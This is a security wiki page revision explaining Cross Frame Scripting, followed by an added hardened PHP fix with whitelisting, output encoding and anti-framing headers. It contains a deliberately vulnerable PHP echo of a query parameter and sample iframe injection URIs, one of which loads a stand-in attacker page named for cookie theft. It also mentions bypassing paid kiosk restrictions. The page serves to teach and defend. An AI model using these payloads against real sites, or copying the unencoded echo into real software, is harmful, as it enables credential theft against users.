Difference between revisions of "Cross Frame Scripting"
Revision comparison: the previous revision created the page (edit summary: "New page: {{Template:Attack}} ==Description== Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. The attacker using this technique injects code in a frame. Th..."); the current revision is a minor edit (→Categories) that changes line 55 in the ==Categories== section from the truncated "[[" to "[[Category:Injection]]".
Revision as of 22:41, 4 November 2007
This is an Attack. To view all attacks, please see the Attack Category page.
Description
Cross Frame Scripting (XFS) is an attack that belongs to the Cross Site Scripting family. An attacker using this technique injects code that places a frame into the page. With XFS the attacker can inject their own content into a login form, i.e. a form whose purpose is to authenticate a legitimate user to their bank or auction account.
Examples
The attacker has found a website that allows its input variables to be manipulated: the variables are sent using the GET or POST method but are not properly validated before being echoed back, e.g.:
$ cat greetz.php
<?php
// Deliberately vulnerable (the page's example): the "greetings" query parameter is
// written into the HTML response without any validation or output encoding.
print "Hello! Welcome to Hell!";
print $_GET['greetings'];
?>
If the attacker requests the following URI:
/greetz.php?greetings=<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>;
then the injection succeeds: the browser renders the attacker's frame as part of the vulnerable page.
Another example is a simple JavaScript nesting, where the frame's source is a javascript: URI (the original text omitted the space between the element name and the src attribute):
/greetz.php?greetings=<iframe src="javascript:alert('0wn3d!');"></iframe>
The attacker may combine the above examples with appropriate frame attributes (size, border, position), which makes it easier to adjust the injected frame to the original layout of the page that is prone to Cross Frame Scripting. The attack can also be used to bypass restrictions in, for example, an E-kiosk that provides Internet access for a fee, or to reach the kiosk's extra functionality or restricted areas.
References:
Related Threats
Related Attacks
Related Vulnerabilities
Related Countermeasures
Use whitelists and, wherever possible, define the expected format of the input data so that anything else is rejected rather than echoed back.
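As an added example (not code from the original page or from OWASP), the following is a hardened counterpart to the vulnerable greetz.php shown in the Examples section, implementing the whitelist countermeasure above together with output encoding and anti-framing response headers. The allowed greeting keys, the header values and the CLI self-check are assumptions made for this example; the two payloads used in the self-check are the ones from the page.

```php
<?php
// Added example, not the page's own code: hardened greetz.php.
// The allowlist contents and header values below are illustrative assumptions.
declare(strict_types=1);

// Countermeasure 1: whitelist. The expected format of "greetings" is one of a
// fixed set of keys, so markup such as <iframe ...> can never be selected.
const ALLOWED_GREETINGS = [
    'morning' => 'Good morning',
    'evening' => 'Good evening',
    'default' => 'Hello',
];

function pick_greeting(array $query): string
{
    $key = $query['greetings'] ?? 'default';
    // is_string rejects greetings[]=... (array) input; the lookup rejects any value
    // that is not an allowlisted key, falling back to the default greeting.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_GREETINGS)) {
        $key = 'default';
    }
    return ALLOWED_GREETINGS[$key];
}

// Countermeasure 2 (defence in depth): every value written into the response is
// HTML-encoded, so even if the allowlist were relaxed later, "<iframe ...>" would be
// rendered as literal text instead of being parsed as an element.
function render_page(string $greeting): string
{
    $safe = htmlspecialchars($greeting, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<!doctype html><html><body><p>{$safe}! Welcome.</p></body></html>";
}

if (PHP_SAPI === 'cli') {
    // Offline self-check with the page's two payloads (constructed input, no web
    // server required): neither survives as markup on either code path.
    $payloads = [
        '<iframe src="http://my.evilsites.com/cookie_monster.php"></iframe>',
        '<iframe src="javascript:alert(\'0wn3d!\');"></iframe>',
    ];
    foreach ($payloads as $payload) {
        $viaAllowlist = render_page(pick_greeting(['greetings' => $payload]));
        $viaEncoding  = render_page($payload); // what encoding alone would do
        foreach ([$viaAllowlist, $viaEncoding] as $html) {
            if (strpos($html, '<iframe') !== false) {
                fwrite(STDERR, "FAIL: frame element reached the output\n");
                exit(1);
            }
        }
        echo $viaAllowlist, PHP_EOL;   // <p>Hello! Welcome.</p>
        echo $viaEncoding, PHP_EOL;    // &lt;iframe src=&quot;...&quot;&gt; ... as text
    }
    echo "OK: both payloads neutralised\n";
    exit(0);
}

// Countermeasure 3: forbid other origins from framing this page, so the login or
// greeting page itself cannot be wrapped in an attacker-controlled frame.
header('Content-Type: text/html; charset=UTF-8');
header('X-Frame-Options: DENY');
header("Content-Security-Policy: frame-ancestors 'none'; default-src 'self'");

echo render_page(pick_greeting($_GET));
```

Run `php greetz_hardened.php` to execute the self-check; served through a web server, the same file answers `/greetz_hardened.php?greetings=evening` with "Good evening" and answers either payload above with the default greeting. The whitelist is the primary control; htmlspecialchars and the frame-ancestors / X-Frame-Options headers are kept independent of it so that a future change to one layer does not silently reopen the injection.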